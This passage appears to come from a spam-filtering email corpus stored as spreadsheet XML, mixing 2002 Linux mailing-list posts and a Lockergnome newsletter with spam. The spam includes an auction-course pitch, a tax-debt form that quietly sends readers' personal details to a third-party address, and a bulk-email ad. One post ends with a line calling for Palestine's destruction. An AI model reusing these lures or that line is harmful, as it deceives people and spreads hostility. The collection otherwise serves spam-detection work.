         &lt;strong&gt;KEEP THE CONFIRMATION EMAIL HANDY!&lt;/strong&gt; It
         contains all the codes and access numbers to view the
         program on your PC and get on the call! &lt;br&gt;
         &lt;br&gt;
         This conference will be sold out - actually since the
         entire program is free It will simply fill up - once it
         is full - it's full - to guarantee your participation
         register right now! &lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
         &lt;h3&gt;&lt;font color=3D"#FF0000" face=3D"Arial"&gt;HERE IS HOW YOU
         REGISTER &amp;amp; LOCK IN YOUR POSITION:&lt;/font&gt;&lt;/h3&gt;
         &lt;p&gt;&lt;font color=3D"#0000FF" face=3D"Arial"&gt;&lt;strong&gt;You have to
         go to this website: &lt;/strong&gt;&lt;/font&gt;
         &lt;a href=3D"http://64.251.23.141/marketing/auction/index.html"&gt;&lt;fon=
 t
         color=3D"#0000FF" face=3D"Arial"&gt;CLICK HERE&lt;/font&gt;&lt;font
         face=3D"Arial"&gt; &lt;/font&gt;&lt;/a&gt;&lt;font face=3D"Arial"&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;strong&gt;Be sure to do it &lt;/strong&gt;&lt;/font&gt;&lt;font
         color=3D"#FF0000" face=3D"Arial"&gt;&lt;strong&gt;NOW&lt;/strong&gt;&lt;/font&gt;&lt;font
         face=3D"Arial"&gt;&lt;strong&gt; - the web conference and auction profits c=
 ourse are going to go QUICKLY ... and I don't want
         you to miss out! &lt;/strong&gt;&lt;br&gt;
         &lt;br&gt;
         Sincerely, &lt;br&gt;
         &lt;br&gt;
         Taylor Brooks &lt;br&gt;
         eBay Auction News&lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
         &lt;hr&gt;
         &lt;p&gt;&lt;font
         face=3D"Arial"&gt;To be removed,
         &lt;a href=3D"http://64.251.23.141/affiliates/removeme.html"&gt;CLICK HE=
 RE&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;/td&gt;
     &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;&lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: bad focus/click behaviours
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;&gt;&gt; On Fri, 13 Sep 2002, "Tony" == Tony Nugent wrote:
   Tony&gt; I can't even mark text in an exmh message window and then
   Tony&gt; paste it into a terminal window, the cut buffer seems to
   Tony&gt; be completely empty (and its previous contents are no
   Tony&gt; longer there either).
 Brent confessed recently that he had tried to subvert the X
 model(s) of copy and paste.  Not in those words... but that
 was how I read it. ;)
 I have a lot of trouble copying and pasting from or to exmh 
 across a VNC link (from things in the vncviewer to things not in 
 it and vice versa).  As long as I stick to apps being "normally" 
 displayed on my X server I don't have much of a problem.
 My recollection from my X programming days is that the X model,
 like everything in X, is more complex than the human brain can
 handle.  It also is very different from the MS-Windows model.
 And I get the feeling that Tk tries to "unify" those two models
 and fails.  Not sure what the exmh-specific contribution to the 
 confusion is, frankly.
 --Hal
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] RE: removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">
 on NT 4 you should get it at the point where you choose 
 which partition to format/install onto .... It's been a 
 while though so I might be wrong. Ted says I might have 
 dreamed it just like that spider baby/Linux thing :-)
 --Dougal
 -----Original Message-----
 From: SoloCDM [mailto:deedsmis@aculink.net]
 Sent: 02 August 2002 10:33
 To: Hunt, Bryan
 Cc: ILUG (Request)
 Subject: Re: removing lilo
 "Hunt, Bryan" stated the following:
 &gt; 
 &gt; choose the repair option when installing windows nt/2000/whatever
 What is the "repair option"?
 &gt; -----Original Message----- From: SoloCDM [mailto:deedsmis@aculink.net]
 &gt; Sent: 31 July 2002 17:48 To: Hunt, Bryan Cc: ILUG (Request)
 &gt; Subject: Re: removing lilo
 &gt; 
 &gt; "Hunt, Bryan" stated the following:
 &gt; 
 &gt; &gt; you need to do a "fdisk /mbr" from a bootable windoze floppy
 &gt; &gt; alternatively boot from linux boot disk and do fdisk, delete all
 &gt; 
 &gt; partitions.
 &gt; 
 &gt; I need to ask a question concerning this issue.
 &gt; 
 &gt; What if I don't want to get rid of the MBR -- it will destroy the
 &gt; OS on that drive.  How do I remove lilo without the above fdisk
 &gt; procedure?
 &gt; 
 &gt; &gt; -----Original Message----- From: jac1
 &gt; &gt; [mailto:jac1@student.cs.ucc.ie]
 &gt; 
 &gt; &gt; i recently had to wipe linux from my pc but forgot to restore the
 &gt; &gt; original MBR (NT). Anyone know how i can do this? linux is entirely
 &gt; &gt; gone and no
 &gt; 
 &gt; boot
 &gt; 
 &gt; &gt; floppy. formatting the entire disk doesn't do it either.
 -- 
 Note: When you reply to this message, please include the mailing
       list and/or newsgroup address and my email address in To:
 *********************************************************************
 Signed,
 SoloCDM
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: apt and a hybrid system
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote:
 &gt; If I can use apt, can I use it to get updates from these 3 different places:
 &gt; 1. the (null) up2date Redhat upgrades
 &gt; 2. the (null) files at Freshrpms.net
 &gt; 3. the regular RH7.3 files from freshrpms.net
 You could build your own apt-repository. Just mirror the needed directories
 (e.g. by using a wget cron job), symlink the needed rpms and recreate the
 repository. It is already worth the trouble, if you have more than one
 installation.
 In any case in order to acces the mentioned places, somebody must keep such a
 repository up to date, be it yourself or someone else.
 -- 
 Axel.Thimm@physik.fu-berlin.de
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: It's a small world
</t>
  </si>
  <si>
    <t xml:space="preserve">Or even "When did Somerville get the internet?"  ;-)
 E
 Luis Villa wrote:
 &gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:
 &gt;
 &gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and
 &gt;&gt;asked me how I was getting net here. And _then_ we figured out 
 &gt;&gt;that we have shared context.
 &gt;&gt;
 &gt;
 &gt;The obvious followup is 'there's a cafe in somerville with net access?'
 &gt;Luis [19 Pitman St.]
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] can't call method "log" issue - solution
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I see that Robert S. Wojciechowski Jr. posted about this issue on 7/26,
 but I don't see any responses. I get that error when calling razor-report
 from a sendmail alias, but not from the command line as a different user.
 The way I solved it was to run 
 razor-admin -create
 and
 razor-admin -discover
 with a -home argument set to the global /etc/razor directory, which is
 explicitly specified in the args to the alias pipe.
 The manual page, which suggests that /etc/razor/razor-agent.conf will be
 loaded first, does not also say that razor-admin will then create a
 .razor directory in the user's home directory if it does not exist
 (although this /is/ pointed out in the razor-agents(1) page. This may
 lead to some minor confusion if the user is trying to set the discovery
 and other defaults for a default (e.g., /etc/razor) install. The
 workaround is as I say above, namely, explicitly specify the path to
 razorhome on the command line, e.g.
 razor-admin -home=/etc/razor -create
 razor-admin -home=/etc/razor -discover
 hth,
 Steve
 -- 
 hesketh.com/inc. v: (919) 834-2552 f: (919) 834-2554 w: http://hesketh.com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</si>
  <si>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blogged item
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href=http://www.aaronsw.com/weblog/&gt;
 Aaron&lt;/a&gt; sez:
   It's 1:30AM. Hours ago, my server seemed to stop working. I could ping
   it, but I couldn't do anything else. We drove over to see what was up.
   ... I'll just say that everything broke. Repeatedly.  ...  I think I
   have a small idea what it's like to be Evan now. This is not what I want
   to be when I grow up.
 Never mind that -- I think you now have an idea what it's like to be
 an on-call sysadmin ;)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] SpamAssassin v2.40 released (finally)!
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Richard Kimber wrote:
 &gt; On Mon, 2 Sep 2002 13:20:46 -0700 (PDT)
 &gt; Bart Schaefer &lt;schaefer@zanshin.com&gt; wrote:
 &gt; 
 &gt; &gt; If you're using "fetchmail --mda spamassassin" or the equivlent, then
 &gt; &gt; this change means your current setup will no longer work. 
 &gt; 
 &gt; Oh well, I guess there are other anti-spam options out there.
 Well, (a) you don't HAVE to upgrade, and (b) what you are doing has never
 been safe in the first place because SpamAssassin 2.31-and-before doesn't
 do any kind of file locking while it writes to the mailbox and doesn't
 promise to return the proper failure code on disk-full conditions, etc.
 If you're still willing to live with (b), all you need is a little shell
 script to run spamassassin:
 ----------
 #!/bin/sh
 # call this file "spamassassin-wrapper" and chmod +x it
 {
 echo "From $1 `date`"
 sed -e '1{/^From /d;}' | spamassassin
 echo ''
 } &gt;&gt; $MAIL
 ----------
 And then use
 fetchmail --mda 'spamassassin-wrapper %F'
 and you should be all set.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</si>
  <si>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E-Textiles Come into Style
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Cool - I wonder what you'd look like standing in front of a bunch of
 corporate executives...
 ==
 http://www.technologyreview.com/articles/wo_hellweg080102.asp
 That's why, for example, Orth is trying to catch the interest of the
 military with fabrics that change color when conductive fibers stitched into
 the cloth heat and cool the material's thermochromatic inks. "The army wants
 fully addressable, interactive camouflage," she says, "so that when you're
 standing in front of bricks, your clothing looks like bricks. When you're in
 grass, you look like grass. Accomplishing that would be like a space program
 for e-textiles."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Our friends the Palestinians, Our servants in government.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hijacker High (8/30) 
 Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
 hijacking in which 36 Israelis and an American nature photographer, Gail
 Ruban, were killed. Mughrabi has a Palestinian high school named after
 her, and it's apparently starting to show signs of wear. Fortunately,
 the United States Agency for International Development has stepped in
 with money to help renovate it.
 http://reason.com/brickbats/bb-april.shtml
 Links to:
 http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
 ve\200208\FOR20020807e.html
 Praeterea censeo Palestininem esse delendam.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Have tax problems?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY BGCOLOR="WHITE"&gt;
 &lt;TABLE WIDTH=550&gt;&lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=4 FACE="VERDANA" COLOR="#333366"&gt;
 Have tax problems? Do you owe the IRS money? If your debt is
 $5,000 US or more, we can help! Our licensed agents can help
 you with both past and present tax debt. We have direct contacts
 with the IRS, so once your application is processed we can help
 you immediately without further delay.&lt;BR&gt;&lt;BR&gt;
 Also, as our client we can offer you other services and help with
 other problems. Our nationally recognized tax attorneys,
 paralegals, legal assistants and licensed enrolled agents can
 help you with:&lt;BR&gt;&lt;BR&gt;
 - Tax Preparation&lt;BR&gt;
 - Audits&lt;BR&gt;
 - Seizures&lt;BR&gt;
 - Bank Levies&lt;BR&gt;
 - Asset Protection&lt;BR&gt;
 - Audit Reconsideration&lt;BR&gt;
 - Trust Fund Penalty Defense&lt;BR&gt;
 - Penalty Appeals&lt;BR&gt;
 - Penalty Abatement&lt;BR&gt;
 - Wage Garnishments&lt;BR&gt;
 .. and more!&lt;BR&gt;&lt;BR&gt;
 To receive FREE information on tax help, please fill out the
 form below and return it to us. There are no obligations, and
 supplied information is kept strictly confidential. Please note
 that this offer only applies to US citizens. Application
 processing may take up to 10 business days.&lt;BR&gt;&lt;BR&gt;
 Note: For debt size please also include any penalties or interest&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;FORM name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;
 &lt;input type="hidden" name="fromemail" value="ir2@ir.com"&gt;
 &lt;input type="hidden" name="from" value="ir2@ir.com"&gt;
 &lt;input type=hidden name="recipient" value="edie82422c@yahoo.co.uk"&gt;
 &lt;TABLE CELLSPACING=2&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;Full Name&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{name}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;State&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{state}}"&gt;
 &lt;SELECT Name="body"&gt;
 &lt;option value=""&gt;&lt;/option&gt;
 &lt;option value="AL"&gt; Alabama
 &lt;option value="AK"&gt; Alaska
 &lt;option value="AZ"&gt; Arizona
 &lt;option value="AR"&gt; Arkansas
 &lt;option value="CA"&gt; California
 &lt;option value="CO"&gt; Colorado
 &lt;option value="CT"&gt; Connecticut
 &lt;option value="DE"&gt; Delaware
 &lt;option value="DC"&gt; Dist of Columbia
 &lt;option value="FL"&gt; Florida
 &lt;option value="GA"&gt; Georgia
 &lt;option value="HI"&gt; Hawaii
 &lt;option value="ID"&gt; Idaho
 &lt;option value="IL"&gt; Illinois
 &lt;option value="IN"&gt; Indiana
 &lt;option value="IA"&gt; Iowa
 &lt;option value="KS"&gt; Kansas
 &lt;option value="KY"&gt; Kentucky
 &lt;option value="LA"&gt; Louisiana
 &lt;option value="ME"&gt; Maine
 &lt;option value="MD"&gt; Maryland
 &lt;option value="MA"&gt; Massachusetts
 &lt;option value="MI"&gt; Michigan
 &lt;option value="MN"&gt; Minnesota
 &lt;option value="MS"&gt; Mississippi
 &lt;option value="MO"&gt; Missouri
 &lt;option value="MT"&gt; Montana
 &lt;option value="NE"&gt; Nebraska
 &lt;option value="NV"&gt; Nevada
 &lt;option value="NH"&gt; New Hampshire
 &lt;option value="NJ"&gt; New Jersey
 &lt;option value="NM"&gt; New Mexico
 &lt;option value="NY"&gt; New York
 &lt;option value="NC"&gt; North Carolina
 &lt;option value="ND"&gt; North Dakota
 &lt;option value="OH"&gt; Ohio
 &lt;option value="OK"&gt; Oklahoma
 &lt;option value="OR"&gt; Oregon
 &lt;option value="PA"&gt; Pennsylvania
 &lt;option value="RI"&gt; Rhode Island
 &lt;option value="SC"&gt; South Carolina
 &lt;option value="SD"&gt; South Dakota
 &lt;option value="TN"&gt; Tennessee
 &lt;option value="TX"&gt; Texas
 &lt;option value="UT"&gt; Utah
 &lt;option value="VT"&gt; Vermont
 &lt;option value="VA"&gt; Virginia
 &lt;option value="WA"&gt; Washington
 &lt;option value="WV"&gt; West Virginia
 &lt;option value="WI"&gt; Wisconsin
 &lt;option value="WY"&gt; Wyoming
 &lt;/SELECT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;Phone Number&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{phone}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="20"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;Time to Contact&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{besttime}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;Tax Debt Size&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{debtsize}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="20"&gt;&lt;input type="hidden" name="to" value="60299005984"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=2 FACE="VERDANA" COLOR="#333366"&gt;&lt;B&gt;E-Mail&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{email}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="submit" Value="Submit"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/FORM&gt;
 Thank you for your time!&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;FONT SIZE=2&gt;&lt;B&gt;
 Note: If you wish to receive no further advertisements regarding
 this matter or any other, please reply to this e-mail with the
 word REMOVE in the subject.
 &lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 q10bvq9lvq1
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Japanese kids spend a day in school jumping in the swimming pool
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8305901,1717/
 Date: 2002-09-27T09:52:32+01:00
 (The Japan Times)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Serial port trouble
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
     Can anyone offer me any advice on using an MRi dual port PCI - serial
 card.  MRi claim it works, but that not at 9600 baud.  I AM using it at
 9600, but I get a 10s delay on output, followed by just 16 bytes,
 repeated untill complete.  Similarly, on input, I get a delay before the
 app' sees the data.
 TIA
 Shane
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Penguin Shell]  Good Hearts
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020715.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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07.15.2002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You're a good bunch, you Penguins.&lt;p&gt;
 Today's GnomeVOICE really tells the story better than I can, but I'll give you a 
 quick summary. Through your efforts and compassion, reader Karl Steenblik has 
 found a new electronic home for the Foundation for Children and Youth With 
 Diabetes. I'll let Karl tell you which offered solution suited his needs. But, 
 with the volume of responses his request for help generated, it's almost 
 irrelevant. As I expected, we came together as a community and collectively 
 offered him many viable choices from which to pick a solution that would work 
 for the kids. The global scope of your concern and our collective ability to 
 effect a change has humbled me once again. Just when you start to get a little 
 callous about the 'Net ...&lt;p&gt;
 Accordingly, I'd like to sketch out an idea with you that can be an ongoing part 
 of Penguin Shell. It's an open discussion, really, about how we can further put 
 our technical skills (be they Linux &lt;i&gt;or&lt;/i&gt; Windows skills) to work for a good 
 cause. I'm proposing that we start an organized volunteer effort, based in the 
 Penguin Shell readership, to provide volunteer technical services to worthwhile 
 charitable organizations. First, we need a &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell Project Name 
 Suggestion"&gt;name&lt;/a&gt; that clearly describes our purpose. Next, we need 
 volunteers with the time and ability to lend those &lt;a 
 href="mailto:tony@lockergnome.com?subject=Penguin Shell - My Volunteer 
 Skills"&gt;skills&lt;/a&gt; to a good cause. Finally, we'll need some suggestions as to 
 the charitable &lt;a href="mailto:tony@lockergnome.com?subject=Penguin Shell - 
 Great Organizations"&gt;organizations&lt;/a&gt; that are near and dear to your heart. Or, 
 maybe the organization is one you're already working with - one you're certain 
 can use some hands-on or remote volunteer help.&lt;p&gt;
 I'll start that ball rolling with a personal organizational suggestions - the &lt;a 
 href="http://www.aicardi.com/" target="_blank"&gt;Aicardi Syndrome Foundation&lt;/a&gt;. 
 Though I don't currently know their technical needs, I do know that the syndrome 
 is very rare - read "research and technical dollars are minimal." I'm sure we 
 can, as a group, provide them a way to fill existing technical holes.&lt;p&gt;
 That's just a suggestion. Feel free to use the mailto links above to make 
 others.&lt;p&gt;
 Over the next few weeks, I plan on modifying my current favorite blogging 
 program, &lt;a href="http://geeklog.sourceforge.net/" target="_blank"&gt;GeekLog&lt;/a&gt; 
 to pull together a community project area where interested parties can gather, 
 coordinate and discuss whatever this project might become. I'll keep you posted 
 on the details.&lt;p&gt;
 In one of the earliest issues of Penguin Shell, I told a story about Emperor 
 Penguins - how they huddle together on the shore, knowing that their protection 
 from predators lies in sheer numbers. When one takes the leap into the water, 
 all the others follow; individual involvement for the good of the community.&lt;p&gt;
 Where could the analogy possibly be more fitting?&lt;p&gt;&lt;p&gt;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&lt;b&gt;Quick Shortcuts&lt;/b&gt;&lt;p&gt;
 Linux is chock full of keyboard shortcuts that, when used, streamline the way 
 you use your system. Today's Tweaks are really user tweaks - built in shortcuts 
 you can use to maximize your Linux efficiency. You don't have to change your 
 system, just how you use what's already there. They're two tips that are quick 
 and very easy to learn and remember.&lt;p&gt;
 Got a cluttered console screen? Use &lt;b&gt;[ctrl]+l&lt;/b&gt; to clear it. This does the 
 same thing as the &lt;b&gt;clear&lt;/b&gt; command with far fewer keystrokes.&lt;p&gt;
 Do you want to log out of the console screen quickly? Use the &lt;b&gt;[ctrl+d&lt;/b&gt; key 
 combination. This will log out the current user. If you're using bash and the 
 current user is not root, the [ctrl]+d combination will close the terminal 
 window, as well.&lt;p&gt;
 To me, any opportunity to save keystrokes is a good one. Better yet, if I can 
 avoid having to take my fingers from the keyboard to reach for the mouse, then 
 I've really saved some time. Though it's tough to quantify the time savings 
 using these keystroke combination shortcuts, intuitively I can tell you it's 
 substantial.&lt;p&gt;
 Maximum efficiency. That's what Tweaks are all about.&lt;p&gt;&lt;p&gt;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XI&lt;/b&gt;&lt;p&gt;
 We've covered some fairly light topics to this point in the kernel configuration 
 series. Today's topic requires a bit of review. We'll discuss configuring block 
 devices in your kernel.&lt;p&gt;
 We've talked about the different types of devices in previous Penguin Shell 
 issues. Fundamentally, the two that you'll deal with the most are block and 
 character devices. These draw their type names from the way they handle data. 
 Block devices receive data for storage in chunks, generally pre-set sizes of 
 data "blocks." Hard drives are block devices. They'll only write chunks of data 
 to storage. Thus, the problem with shutting down your machine uncleanly. Data 
 intended for storage may not, in fact, have been written at the time your power 
 dies or you hard kill your machine. The system may still be accumulating data up 
 to the proper block size before committing it to the hard drive.&lt;p&gt;
 Character devices, on the other hand, receive data in "streams," one character 
 at a time. Serial ports are a great example of character devices. They handle 
 data input and output on the fly, rather than filling a buffer &lt;i&gt;then&lt;/i&gt; 
 committing the data.&lt;p&gt;
 The physical nature of these device types goes a long way toward explaining why 
 they handle data as they do. A hard drive has to physically spin up to store or 
 retrieve data. You're actually changing the magnetic properties of the disc 
 surface when you store data. Consequently, a hard drive has to know where 
 there's free space on the disc surface, has to move that area of the disc under 
 the write head and try, as best it can, to group blocks of related data 
 together.&lt;p&gt;
 Character devices really don't store data as much as they send it off and forget 
 about it. The process is purely electrical rather than electrical and physical. 
 The serial port, for example, sends data in a stream to your Palm Pilot. The 
 storage of the data is actually handled by the Palm itself, not a physical 
 storage device on the computer. There's no need to spin up a drive and account 
 for the data as is necessary with a hard drive. The Palm will also send a signal 
 back to the computer confirming receipt of data. That's an indication that 
 character devices often communicate in both directions, as well.&lt;p&gt;
 So, when you're configuring block devices in your kernel, you're preparing the 
 system for communicating with a device that will buffer data to a predetermined 
 level, then write that data as a block, changing the physical properties of the 
 hard drive disc surface. Even though that's the highest level view of the 
 process, it still shows how difficult a process physical data storage really 
 is.&lt;p&gt;
 In the block device section, you'll find many options for physical data storage. 
 When configuring this section, it's crucial to know as much about your existing 
 hardware as possible. What type (brand) of hard drives are you using? What's the 
 interface to the machine - IDE, parallel, etc? Where is the drive located - on 
 the local machine or on a network-connected box? Because the variables are so 
 broad, it's nearly impossible to give you a stock configuration tip that will 
 work for your personal machine every time. I can tell you this - you will have 
 block devices (normally a hard drive and a floppy), and you need to answer as 
 many of the above questions as you can. Find out as much about these physical 
 devices as you can, and the configuration process will be relatively 
 painless.&lt;p&gt;
 A warning - you'll see more configuration tips like this as the series continues 
 to progress. I'll certainly make hands-on configuration recommendations where 
 possible. There are quite a few areas where I can make such recommendations. 
 However, where the variable set is as broad as block devices, much of the 
 legwork will be up to you.&lt;p&gt;
 Tomorrow, we'll talk about RAID and multi-device support in Linux.&lt;p&gt;
 &lt;p&gt;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&lt;b&gt;rxLinux&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.fusionw3.com/rxlinux/ 
 "&gt;http://www.fusionw3.com/rxlinux/ &lt;/a&gt;&lt;p&gt;
 "The concept behind rxlinux is to centralise configuration and management of 
 multiple Linux servers. New servers can be deployed in minutes. A Web interface 
 is used to build custom ISO CD-ROMs dedicated for specific servers. Servers, 
 also called rxnodes, boot up from that CD-ROM and get the rest of the 
 configuration and software from a master server. No administration is done 
 directly on the nodes; everything is controlled from the master servers. When 
 the rxnode has finished booting up and all software is running, it is completely 
 independent from the rxmaster until the next reboot."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Penguin Hearts&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Karl Steenblik&lt;/span&gt;&lt;p&gt;
 "I can not believe all of the help your posting to the Linux community has
 generated.  I have had over 20 offers for help.  Some of the offers would
 not fit our space needs but that number of responses shows that Linux
 people care.&lt;p&gt;
 "I am overwhelmed with gratitude with Lockergnome and
 &lt;a href="http://digitaldaze.com/" target="_blank"&gt;http://digitaldaze.com/&lt;/a&gt;&lt;p&gt;
 "Bill at Digitaldaze has sent us a large gift of 100 MB of space.  More
 that I think we will ever use.&lt;p&gt;
 "I thank all of the people who offered help.  There are more generous
 people than I can type to individually.  Our camp will hold Linux people
 in the highest esteem and I will make sure Linux, Lockergnome, and
 Digitaldaze have a prominent places on our site in the future.&lt;p&gt;
 "Soon you will be able to visit our new site at
 &lt;a href="http://fcyd.digitaldaze.com/" 
 target="_blank"&gt;http://fcyd.digitaldaze.com/&lt;/a&gt;.&lt;p&gt;
 "Now the work for me begins, moving the site!  Oh the labors of love that
 make us whole.&lt;p&gt;
 "Everyone have a super day.&lt;p&gt;
 "Thank you again for all of your help.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Software.Linux.Com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" 
 href="http://software.linux.com/index/"&gt;http://software.linux.com/index/&lt;/a&gt;&lt;p&gt;
 Software.Linux.Com is the revitalized version of Linux.DaveCentral. True to its 
 roots, the site is a great starting point for Linux software and information. 
 Software is categorized under such headings as Audio, File Utilities, Office 
 Applications, and System Utilities. The site also features up-to-date listings 
 of the most recent and most popular Linux software, as well as a program of the 
 day. This site will definitely get bigger, but even for now, it's got nearly any 
 Linux app you're looking for.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020715.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020715.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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</si>
  <si>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Subject: Email marketing info
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Untitled&lt;/TITLE&gt;
 &lt;META content="text/html; charset=windows-1252" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.2614.3500" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;Would you like to advertise your website inexpensively?&lt;BR&gt;&lt;BR&gt;Would you 
 like &lt;B&gt;Double Opt-in Email for as little as $1 CPM&lt;/B&gt; (cost per 
 thousand)?&lt;BR&gt;&lt;BR&gt;We have over 40 million Double Opt-in emails.&lt;BR&gt;* All Emails 
 are Double Opt-In &lt;BR&gt;* Email contains only your advertisement&lt;BR&gt;* Email a Web 
 Page (HTML) or Text Message&lt;BR&gt;* All Emails sent within 72 hours&lt;BR&gt;* Get 
 Immediate Results&lt;BR&gt;&lt;BR&gt;&lt;B&gt;Call 954.757.3869 for more info&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;Member 
 Services - You are receiving this email because you signed up, as a member and 
 are currently subscribed to receive special offers from us or one of our 
 affiliates. This message was not sent to you unsolicited. If you do not want to 
